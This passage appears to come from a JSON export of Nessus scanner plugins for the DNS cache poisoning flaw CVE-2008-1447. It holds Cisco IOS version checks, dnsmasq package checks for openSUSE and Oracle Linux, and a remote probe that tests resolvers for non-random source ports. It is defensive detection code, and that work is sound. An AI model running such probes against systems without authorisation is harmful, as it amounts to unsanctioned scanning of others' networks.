'12.2(2)XT3') flag++;\nelse if (version == '12.2(2)XT2') flag++;\nelse if (version == '12.2(2)XT') flag++;\nelse if (version == '12.2(4)XL6') flag++;\nelse if (version == '12.2(4)XL5') flag++;\nelse if (version == '12.2(4)XL4') flag++;\nelse if (version == '12.2(4)XL3') flag++;\nelse if (version == '12.2(4)XL') flag++;\nelse if (version == '12.2(2)XK3') flag++;\nelse if (version == '12.2(2)XK2') flag++;\nelse if (version == '12.2(2)XK') flag++;\nelse if (version == '12.2(2)XG1') flag++;\nelse if (version == '12.2(2)XG') flag++;\nelse if (version == '12.2(2)XC2') flag++;\nelse if (version == '12.2(2)XC1') flag++;\nelse if (version == '12.2(2)XC') flag++;\nelse if (version == '12.2(2)XB8') flag++;\nelse if (version == '12.2(2)XB7') flag++;\nelse if (version == '12.2(2)XB6') flag++;\nelse if (version == '12.2(2)XB5') flag++;\nelse if (version == '12.2(2)XB3') flag++;\nelse if (version == '12.2(2)XB2') flag++;\nelse if (version == '12.2(2)XB15') flag++;\nelse if (version == '12.2(2)XB14') flag++;\nelse if (version == '12.2(2)XB11') flag++;\nelse if (version == '12.2(8)TPC10c') flag++;\nelse if (version == '12.2(8)TPC10b') flag++;\nelse if (version == '12.2(15)T9') flag++;\nelse if (version == '12.2(15)T8') flag++;\nelse if (version == '12.2(15)T7') flag++;\nelse if (version == '12.2(15)T5') flag++;\nelse if (version == '12.2(15)T4') flag++;\nelse if (version == '12.2(15)T2') flag++;\nelse if (version == '12.2(15)T16') flag++;\nelse if (version == '12.2(15)T15') flag++;\nelse if (version == '12.2(15)T14') flag++;\nelse if (version == '12.2(15)T13') flag++;\nelse if (version == '12.2(15)T12') flag++;\nelse if (version == '12.2(15)T11') flag++;\nelse if (version == '12.2(15)T10') flag++;\nelse if (version == '12.2(15)T1') flag++;\nelse if (version == '12.2(15)T') flag++;\nelse if (version == '12.2(13)T9') flag++;\nelse if (version == '12.2(13)T8') flag++;\nelse if (version == '12.2(13)T5') flag++;\nelse if (version == '12.2(13)T4') flag++;\nelse if (version == '12.2(13)T3') flag++;\nelse if (version == '12.2(13)T2') flag++;\nelse if (version == '12.2(13)T16') flag++;\nelse if (version == '12.2(13)T14') flag++;\nelse if (version == '12.2(13)T13') flag++;\nelse if (version == '12.2(13)T12') flag++;\nelse if (version == '12.2(13)T11') flag++;\nelse if (version == '12.2(13)T10') flag++;\nelse if (version == '12.2(13)T1a') flag++;\nelse if (version == '12.2(13)T1') flag++;\nelse if (version == '12.2(13)T') flag++;\nelse if (version == '12.2(11)T9') flag++;\nelse if (version == '12.2(11)T8') flag++;\nelse if (version == '12.2(11)T6') flag++;\nelse if (version == '12.2(11)T5') flag++;\nelse if (version == '12.2(11)T3') flag++;\nelse if (version == '12.2(11)T2') flag++;\nelse if (version == '12.2(11)T11') flag++;\nelse if (version == '12.2(11)T10') flag++;\nelse if (version == '12.2(11)T1') flag++;\nelse if (version == '12.2(11)T') flag++;\nelse if (version == '12.2(8)T8') flag++;\nelse if (version == '12.2(8)T5') flag++;\nelse if (version == '12.2(8)T4') flag++;\nelse if (version == '12.2(8)T3') flag++;\nelse if (version == '12.2(8)T2') flag++;\nelse if (version == '12.2(8)T10') flag++;\nelse if (version == '12.2(8)T1') flag++;\nelse if (version == '12.2(8)T') flag++;\nelse if (version == '12.2(4)T7') flag++;\nelse if (version == '12.2(4)T6') flag++;\nelse if (version == '12.2(4)T5') flag++;\nelse if (version == '12.2(4)T3') flag++;\nelse if (version == '12.2(4)T2') flag++;\nelse if (version == '12.2(4)T1') flag++;\nelse if (version == '12.2(4)T') flag++;\nelse if (version == '12.2(2)T4') flag++;\nelse if (version == '12.2(2)T1') flag++;\nelse if (version == '12.2(2)T') flag++;\nelse if (version == '12.2(12h)M1') flag++;\nelse if (version == '12.2(12b)M1') flag++;\nelse if (version == '12.2(15)CZ3') flag++;\nelse if (version == '12.2(15)CZ2') flag++;\nelse if (version == '12.2(15)CZ1') flag++;\nelse if (version == '12.2(15)CZ') flag++;\nelse if (version == '12.2(4)BW2') flag++;\nelse if (version == '12.2(4)BW1a') flag++;\nelse if (version == '12.2(4)BW1') flag++;\nelse if (version == '12.2(4)BW') flag++;\nelse if (version == '12.2(16)B2') flag++;\nelse if (version == '12.2(16)B1') flag++;\nelse if (version == '12.2(16)B') flag++;\nelse if (version == '12.2(15)B') flag++;\nelse if (version == '12.2(4)B8') flag++;\nelse if (version == '12.2(4)B7') flag++;\nelse if (version == '12.2(4)B6') flag++;\nelse if (version == '12.2(4)B5') flag++;\nelse if (version == '12.2(4)B4') flag++;\nelse if (version == '12.2(4)B3') flag++;\nelse if (version == '12.2(4)B2') flag++;\nelse if (version == '12.2(4)B1') flag++;\nelse if (version == '12.2(4)B') flag++;\nelse if (version == '12.2(46a)') flag++;\nelse if (version == '12.2(46)') flag++;\nelse if (version == '12.2(40a)') flag++;\nelse if (version == '12.2(40)') flag++;\nelse if (version == '12.2(37)') flag++;\nelse if (version == '12.2(34a)') flag++;\nelse if (version == '12.2(34)') flag++;\nelse if (version == '12.2(32)') flag++;\nelse if (version == '12.2(31)') flag++;\nelse if (version == '12.2(29b)') flag++;\nelse if (version == '12.2(29a)') flag++;\nelse if (version == '12.2(29)') flag++;\nelse if (version == '12.2(28d)') flag++;\nelse if (version == '12.2(28c)') flag++;\nelse if (version == '12.2(28b)') flag++;\nelse if (version == '12.2(28a)') flag++;\nelse if (version == '12.2(28)') flag++;\nelse if (version == '12.2(27c)') flag++;\nelse if (version == '12.2(27b)') flag++;\nelse if (version == '12.2(27a)') flag++;\nelse if (version == '12.2(27)') flag++;\nelse if (version == '12.2(26c)') flag++;\nelse if (version == '12.2(26b)') flag++;\nelse if (version == '12.2(26a)') flag++;\nelse if (version == '12.2(26)') flag++;\nelse if (version == '12.2(24b)') flag++;\nelse if (version == '12.2(24a)') flag++;\nelse if (version == '12.2(24)') flag++;\nelse if (version == '12.2(23f)') flag++;\nelse if (version == '12.2(23e)') flag++;\nelse if (version == '12.2(23d)') flag++;\nelse if (version == '12.2(23c)') flag++;\nelse if (version == '12.2(23a)') flag++;\nelse if (version == '12.2(23)') flag++;\nelse if (version == '12.2(21b)') flag++;\nelse if (version == '12.2(21a)') flag++;\nelse if (version == '12.2(21)') flag++;\nelse if (version == '12.2(19c)') flag++;\nelse if (version == '12.2(19b)') flag++;\nelse if (version == '12.2(19a)') flag++;\nelse if (version == '12.2(19)') flag++;\nelse if (version == '12.2(17f)') flag++;\nelse if (version == '12.2(17e)') flag++;\nelse if (version == '12.2(17d)') flag++;\nelse if (version == '12.2(17b)') flag++;\nelse if (version == '12.2(17a)') flag++;\nelse if (version == '12.2(17)') flag++;\nelse if (version == '12.2(16f)') flag++;\nelse if (version == '12.2(16c)') flag++;\nelse if (version == '12.2(16b)') flag++;\nelse if (version == '12.2(16a)') flag++;\nelse if (version == '12.2(16)') flag++;\nelse if (version == '12.2(13e)') flag++;\nelse if (version == '12.2(13c)') flag++;\nelse if (version == '12.2(13b)') flag++;\nelse if (version == '12.2(13a)') flag++;\nelse if (version == '12.2(13)') flag++;\nelse if (version == '12.2(12m)') flag++;\nelse if (version == '12.2(12l)') flag++;\nelse if (version == '12.2(12k)') flag++;\nelse if (version == '12.2(12j)') flag++;\nelse if (version == '12.2(12i)') flag++;\nelse if (version == '12.2(12h)') flag++;\nelse if (version == '12.2(12g)') flag++;\nelse if (version == '12.2(12f)') flag++;\nelse if (version == '12.2(12e)') flag++;\nelse if (version == '12.2(12c)') flag++;\nelse if (version == '12.2(12b)') flag++;\nelse if (version == '12.2(12a)') flag++;\nelse if (version == '12.2(12)') flag++;\nelse if (version == '12.2(10g)') flag++;\nelse if (version == '12.2(10d)') flag++;\nelse if (version == '12.2(10b)') flag++;\nelse if (version == '12.2(10a)') flag++;\nelse if (version == '12.2(10)') flag++;\nelse if (version == '12.2(7g)') flag++;\nelse if (version == '12.2(7c)') flag++;\nelse if (version == '12.2(7b)') flag++;\nelse if (version == '12.2(7a)') flag++;\nelse if (version == '12.2(7)') flag++;\nelse if (version == '12.2(6j)') flag++;\nelse if (version == '12.2(6i)') flag++;\nelse if (version == '12.2(6h)') flag++;\nelse if (version == '12.2(6g)') flag++;\nelse if (version == '12.2(6f)') flag++;\nelse if (version == '12.2(6e)') flag++;\nelse if (version == '12.2(6d)') flag++;\nelse if (version == '12.2(6c)') flag++;\nelse if (version == '12.2(6b)') flag++;\nelse if (version == '12.2(6a)') flag++;\nelse if (version == '12.2(6)') flag++;\nelse if (version == '12.2(5d)') flag++;\nelse if (version == '12.2(5a)') flag++;\nelse if (version == '12.2(5)') flag++;\nelse if (version == '12.2(3g)') flag++;\nelse if (version == '12.2(3d)') flag++;\nelse if (version == '12.2(3b)') flag++;\nelse if (version == '12.2(3)') flag++;\nelse if (version == '12.2(1d)') flag++;\nelse if (version == '12.2(1c)') flag++;\nelse if (version == '12.2(1b)') flag++;\nelse if (version == '12.2(1a)') flag++;\nelse if (version == '12.2(1)') flag++;\nelse if (version == '12.1(5)T9') flag++;\nelse if (version == '12.1(5)T8') flag++;\nelse if (version == '12.1(5)T7') flag++;\nelse if (version == '12.1(5)T6') flag++;\nelse if (version == '12.1(5)T5') flag++;\nelse if (version == '12.1(5)T4') flag++;\nelse if (version == '12.1(5)T20') flag++;\nelse if (version == '12.1(5)T2') flag++;\nelse if (version == '12.1(5)T19') flag++;\nelse if (version == '12.1(5)T18') flag++;\nelse if (version == '12.1(5)T17') flag++;\nelse if (version == '12.1(5)T15') flag++;\nelse if (version == '12.1(5)T12') flag++;\nelse if (version == '12.1(5)T10') flag++;\nelse if (version == '12.1(5)T') flag++;\nelse if (version == '12.1(3)T') flag++;\nelse if (version == '12.1(2)T') flag++;\nelse if (version == '12.1(1)T') flag++;\nelse if (version == '12.1(27b)') flag++;\nelse if (version == '12.1(27a)') flag++;\nelse if (version == '12.1(27)') flag++;\nelse if (version == '12.1(26)') flag++;\nelse if (version == '12.1(25)') flag++;\nelse if (version == '12.1(24)') flag++;\nelse if (version == '12.1(22c)') flag++;\nelse if (version == '12.1(22b)') flag++;\nelse if (version == '12.1(22a)') flag++;\nelse if (version == '12.1(22)') flag++;\nelse if (version == '12.1(21)') flag++;\nelse if (version == '12.1(20a)') flag++;\nelse if (version == '12.1(20)') flag++;\nelse if (version == '12.1(19)') flag++;\nelse if (version == '12.1(18)') flag++;\nelse if (version == '12.1(17a)') flag++;\nelse if (version == '12.1(17)') flag++;\nelse if (version == '12.1(16)') flag++;\nelse if (version == '12.1(15)') flag++;\nelse if (version == '12.1(14)') flag++;\nelse if (version == '12.1(13a)') flag++;\nelse if (version == '12.1(13)') flag++;\nelse if (version == '12.1(12b)') flag++;\nelse if (version == '12.1(12a)') flag++;\nelse if (version == '12.1(12)') flag++;\nelse if (version == '12.1(11b)') flag++;\nelse if (version == '12.1(11)') flag++;\nelse if (version == '12.1(10a)') flag++;\nelse if (version == '12.1(10)') flag++;\nelse if (version == '12.1(9a)') flag++;\nelse if (version == '12.1(9)') flag++;\nelse if (version == '12.1(8a)') flag++;\nelse if (version == '12.1(8)') flag++;\nelse if (version == '12.1(7c)') flag++;\nelse if (version == '12.1(7b)') flag++;\nelse if (version == '12.1(7)') flag++;\nelse if (version == '12.1(6b)') flag++;\nelse if (version == '12.1(6a)') flag++;\nelse if (version == '12.1(6)') flag++;\nelse if (version == '12.1(5e)') flag++;\nelse if (version == '12.1(5c)') flag++;\nelse if (version == '12.1(5b)') flag++;\nelse if (version == '12.1(5a)') flag++;\nelse if (version == '12.1(5)') flag++;\nelse if (version == '12.1(4c)') flag++;\nelse if (version == '12.1(4b)') flag++;\nelse if (version == '12.1(4a)') flag++;\nelse if (version == '12.1(3b)') flag++;\nelse if (version == '12.1(3)') flag++;\nelse if (version == '12.1(2b)') flag++;\nelse if (version == '12.1(2)') flag++;\nelse if (version == '12.1(1c)') flag++;\nelse if (version == '12.1(1)') flag++;\nelse if (version == '12.0(7)XK1') flag++;\nelse if (version == '12.0(7)XK') flag++;\nelse if (version == '12.0(7)T3') flag++;\nelse if (version == '12.0(7)T2') flag++;\nelse if (version == '12.0(7)T') flag++;\nelse if (version == '12.0(5)T') flag++;\nelse if (version == '12.0(4)T') flag++;\nelse if (version == '12.0(3)T2') flag++;\nelse if (version == '12.0(3)T') flag++;\n\nif (get_kb_item(\"Host/local_checks_enabled\"))\n{\n if (flag)\n {\n flag = 0;\n buf = cisco_command_kb_item(\"Host/Cisco/Config/show_running-config\", \"show running-config\");\n if (check_cisco_result(buf))\n {\n if (preg(pattern:\"ip dns server\", multiline:TRUE, string:buf)) { flag = 1; }\n } else if (cisco_needs_enable(buf)) { flag = 1; override = 1; }\n }\n}\n\nif (flag)\n{\n security_warning(port:0, extra:cisco_caveat(override));\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2021-01-17T14:43:31", "description": "This update of dnsmasq uses random UDP source ports and a random TRXID\nnow. (CVE-2008-1447)", "edition": 23, "published": "2008-08-15T00:00:00", "title": "openSUSE 10 Security Update : dnsmasq (dnsmasq-5512)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-1447"], "modified": "2008-08-15T00:00:00", "cpe": ["cpe:/o:novell:opensuse:10.3", "cpe:/o:novell:opensuse:10.2", "p-cpe:/a:novell:opensuse:dnsmasq"], "id": "SUSE_DNSMASQ-5512.NASL", "href": "https://www.tenable.com/plugins/nessus/33895", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update dnsmasq-5512.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(33895);\n script_version(\"1.21\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-1447\");\n script_xref(name:\"IAVA\", value:\"2008-A-0045\");\n\n script_name(english:\"openSUSE 10 Security Update : dnsmasq (dnsmasq-5512)\");\n script_summary(english:\"Check for the dnsmasq-5512 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update of dnsmasq uses random UDP source ports and a random TRXID\nnow. (CVE-2008-1447)\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected dnsmasq package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:dnsmasq\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:10.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:10.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/08/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/08/15\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE10\\.2|SUSE10\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"10.2 / 10.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE10.2\", reference:\"dnsmasq-2.45-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"dnsmasq-2.45-0.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"dnsmasq\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-01-17T12:44:13", "description": "From Red Hat Security Advisory 2008:0789 :\n\nAn updated dnsmasq package that implements UDP source-port\nrandomization is now available for Red Hat Enterprise Linux 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nDnsmasq is lightweight DNS forwarder and DHCP server. It is designed\nto provide DNS and, optionally, DHCP, to a small network.\n\nThe dnsmasq DNS resolver used a fixed source UDP port. This could have\nmade DNS spoofing attacks easier. dnsmasq has been updated to use\nrandom UDP source ports, helping to make DNS spoofing attacks harder.\n(CVE-2008-1447)\n\nAll dnsmasq users are advised to upgrade to this updated package, that\nupgrades dnsmasq to version 2.45, which resolves this issue.", "edition": 24, "published": "2013-07-12T00:00:00", "title": "Oracle Linux 5 : dnsmasq (ELSA-2008-0789)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-1447"], "modified": "2013-07-12T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:dnsmasq", "cpe:/o:oracle:linux:5"], "id": "ORACLELINUX_ELSA-2008-0789.NASL", "href": "https://www.tenable.com/plugins/nessus/67735", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2008:0789 and \n# Oracle Linux Security Advisory ELSA-2008-0789 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(67735);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-1447\");\n script_bugtraq_id(30131);\n script_xref(name:\"RHSA\", value:\"2008:0789\");\n script_xref(name:\"IAVA\", value:\"2008-A-0045\");\n\n script_name(english:\"Oracle Linux 5 : dnsmasq (ELSA-2008-0789)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2008:0789 :\n\nAn updated dnsmasq package that implements UDP source-port\nrandomization is now available for Red Hat Enterprise Linux 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nDnsmasq is lightweight DNS forwarder and DHCP server. It is designed\nto provide DNS and, optionally, DHCP, to a small network.\n\nThe dnsmasq DNS resolver used a fixed source UDP port. This could have\nmade DNS spoofing attacks easier. dnsmasq has been updated to use\nrandom UDP source ports, helping to make DNS spoofing attacks harder.\n(CVE-2008-1447)\n\nAll dnsmasq users are advised to upgrade to this updated package, that\nupgrades dnsmasq to version 2.45, which resolves this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2008-August/000706.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected dnsmasq package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:dnsmasq\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/07/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/08/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 5\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL5\", reference:\"dnsmasq-2.45-1.el5_2.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"dnsmasq\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-02-01T02:03:27", "description": "The remote DNS resolver does not use random ports when making queries\nto third-party DNS servers. An unauthenticated, remote attacker can\nexploit this to poison the remote DNS server, allowing the attacker to\ndivert legitimate traffic to arbitrary sites.", "edition": 28, "cvss3": {"score": 9.1, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H"}, "published": "2008-07-09T00:00:00", "title": "Multiple Vendor DNS Query ID Field Prediction Cache Poisoning", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-1447"], "modified": "2021-02-02T00:00:00", "cpe": [], "id": "DNS_NON_RANDOM_SOURCE_PORTS.NASL", "href": "https://www.tenable.com/plugins/nessus/33447", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif(description)\n{\n script_id(33447);\n script_version (\"1.34\");\n script_cvs_date(\"Date: 2018/11/15 20:50:21\");\n\n script_cve_id(\"CVE-2008-1447\");\n script_bugtraq_id(30131);\n script_xref(name:\"CERT\", value:\"800113\");\n script_xref(name:\"IAVA\", value:\"2008-A-0045\");\n script_xref(name:\"EDB-ID\", value:\"6122\");\n script_xref(name:\"EDB-ID\", value:\"6123\");\n script_xref(name:\"EDB-ID\", value:\"6130\");\n\n script_name(english:\"Multiple Vendor DNS Query ID Field Prediction Cache Poisoning\");\n script_summary(english:\"Determines if the remote DNS server uses random source ports when making queries.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote name resolver (or the server it uses upstream) is affected\nby a DNS cache poisoning vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote DNS resolver does not use random ports when making queries\nto third-party DNS servers. An unauthenticated, remote attacker can\nexploit this to poison the remote DNS server, allowing the attacker to\ndivert legitimate traffic to arbitrary sites.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.cnet.com/news/massive-coordinated-dns-patch-released/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.theregister.co.uk/2008/07/21/dns_flaw_speculation/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Contact your DNS server vendor for a patch.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/07/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/07/09\");\n \n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english: \"DNS\");\n\n script_copyright(english:\"This script is Copyright (C) 2008-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n \n script_dependencie(\"bind_query.nasl\");\n script_require_keys(\"DNS/recursive_queries\");\n exit(0);\n }\n\ninclude(\"global_settings.inc\");\ninclude(\"audit.inc\");\ninclude(\"byte_func.inc\");\ninclude(\"dns_func.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"spad_log_func.inc\");\n\nport = 53;\nif (! get_udp_port_state(port)) exit(0, \"UDP port \"+port+\" is not open.\");\n\nMIN_SAMPLES = 4;\nNUM = 4;\nHARD_LIMIT = 50;\n\nfunction abs()\n{\n local_var x;\n x = _FCT_ANON_ARGS[0];\n if ( x > 0 ) return x;\n return 0 - x;\n}\n\ntotCount = 0;\nper_ip = make_array();\n\nfor ( i = 0 ; i < NUM ; i ++ )\n{\n totCount ++;\n req[\"transaction_id\"] = rand() % 65535;\n req[\"flags\"] = 0x0100;\n req[\"q\"] = 1;\n packet = mkdns(dns:req, query:mk_query(txt:dns_str_to_query_txt(rand_str(length:8, charset:\"abcdefghijklmnopqrstuvwxyz\") + \"-\" + i + \".t.nessus.org.\"), type:0x0010, class:0x0001));\n soc = open_sock_udp(53);\n send(socket:soc, data:packet);\n r = recv(socket:soc, length:4096);\n close(soc);\n if ( ! r )\n exit(1, \"Failed to receive DNS response from socket.\");\n\n r = dns_split(r);\n res = r[\"an_rr_data_0_data\"];\n if ( ! res )\n exit(1, \"DNS result not received.\");\n\n if( strlen(res) < 2 )\n exit(1, \"DNS result length < 2.\");\n\n res = substr(res, 1, strlen(res) - 1);\n if ( res !~ \"^[0-9.]+,[0-9]+\")\n exit(1, \"DNS results don't conform to IP address regex.\");\n\n array = split(res, sep:\",\", keep:FALSE);\n responses_ports = per_ip[array[0]];\n if ( isnull(responses_ports) )\n {\n\t responses_ports = make_list();\n \t if ( max_index(keys(per_ip)) > 0 ) NUM += 4;\n\t}\n responses_ports[max_index(responses_ports)] = int(array[1]);\n per_ip[array[0]] = responses_ports;\n\n if ( totCount > HARD_LIMIT ) break;\n}\n\n# debug logging\nforeach dns_server ( keys(per_ip) )\n{\n responses_ports = per_ip[dns_server];\n spad_log(message:\"DNS Server \" + dns_server + \" response ports : \" + join(responses_ports, sep:\",\"));\n}\n\nbuggy_dns_servers = make_array();\nforeach dns_server ( keys(per_ip) )\n{\n responses_ports = per_ip[dns_server];\n if ( max_index(responses_ports) >= MIN_SAMPLES )\n {\n flag = 0;\n for ( i = 1 ; i < max_index(responses_ports) && flag == 0; i ++ ) {\n if ( abs(responses_ports[i - 1] - responses_ports[i]) >= 20 )\n flag = 1;\n }\n if ( flag == 0 )\n {\n buggy_dns_servers[dns_server] = responses_ports;\n }\n }\n}\n\nif ( max_index(keys(buggy_dns_servers)) > 0 )\n{\n report = \"\nThe remote DNS server uses non-random ports for its\nDNS requests. An attacker may spoof DNS responses.\n\nList of used ports :\n\";\n foreach dns_server ( keys(buggy_dns_servers) )\n {\n report += '\\n+ DNS Server: ' + dns_server + '\\n';\n responses_ports = buggy_dns_servers[dns_server];\n for ( i = 0 ; i < max_index(responses_ports) ; i ++ )\n\t{\n\t report += '|- Port: ' + responses_ports[i] + '\\n';\n\t}\n }\n\n 